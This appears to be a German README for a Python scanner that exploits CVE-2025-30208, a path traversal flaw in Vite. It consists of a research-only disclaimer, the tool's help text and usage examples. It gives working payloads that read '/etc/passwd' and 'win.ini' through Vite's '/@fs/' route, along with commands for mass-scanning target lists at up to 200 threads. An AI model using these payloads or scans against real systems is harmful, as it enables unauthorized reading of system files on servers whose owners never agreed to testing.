
Mehrthreadiger Python-Scanner für die CVE-2025-30208 Vite-Pfadtraversal-Schwachstelle mit Unterstützung für benutzerdefinierte Payloads, Batch-Scanning und Proxy-Debugging.
Die in diesem Dokument beschriebenen Schwachstellen und deren Reproduktionsschritte dienen ausschließlich der Cybersicherheitsforschung und zu Bildungszwecken. Niemand darf die in diesem Dokument bereitgestellten Informationen für illegale Zwecke oder unbefugte Systemtests verwenden. Der Autor übernimmt keine Haftung für direkte oder indirekte Schäden, die aus der Nutzung der Informationen in diesem Dokument resultieren.
Bei Zitierung bitte die Quelle angeben.
https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X
usage: vite_check.py [-h] [-f FILE] [-u URL] [-p PAYLOAD] [--proxy PROXY] [-o OUTPUT] [-t THREADS]
Vite Path Traversal Vulnerability Scanning Tool Author:iSee857
optional arguments:
-h, --help Hilfe anzeigen
-f FILE, --file FILE Datei mit Ziel-URLs
-u URL, --url URL Einzelne Ziel-URL
-p PAYLOAD, --payload PAYLOAD
Benutzerdefinierter Prüfpfad (unterstützt zwei Formate):
1. Mit Prüfmarkierung: /path??indicator
2. Nur Pfad: /path?param=1??
Beispiele:
-p "/@fs/C://windows/win.ini?import&raw??"
-p "/@fs/etc/passwd?import&raw??"
--proxy PROXY Proxy-Server-Adresse (z.B. http://127.0.0.1:8080)
-o OUTPUT, --output OUTPUT
Ausgabedateiname (Standard: results.xlsx)
-t THREADS, --threads THREADS
Anzahl der gleichzeitigen Threads (Standard: 50, Bereich: 1-200)```
Verwendungsbeispiele
1. Einzelnes Ziel scannen:
python CVE-2025-30208-PoC.py -u http://example.com -t 5
2. Batch-Scan von Zielen aus Datei:
python CVE-2025-30208-PoC.py -f targets.txt -o vuln_results.xlsx
3. Mit benutzerdefiniertem Payload:
python CVE-2025-30208-PoC.py -u http://example.com -p "/@fs/etc/passwd?import&raw??"
4. Mit Proxy debuggen:
python CVE-2025-30208-PoC.py -u http://example.com --proxy http://127.0.0.1:8080
5. Kombinierte Parameter:
python CVE-2025-30208-PoC.py -f targets.txt -t 200 -o critical_vulns.xlsx

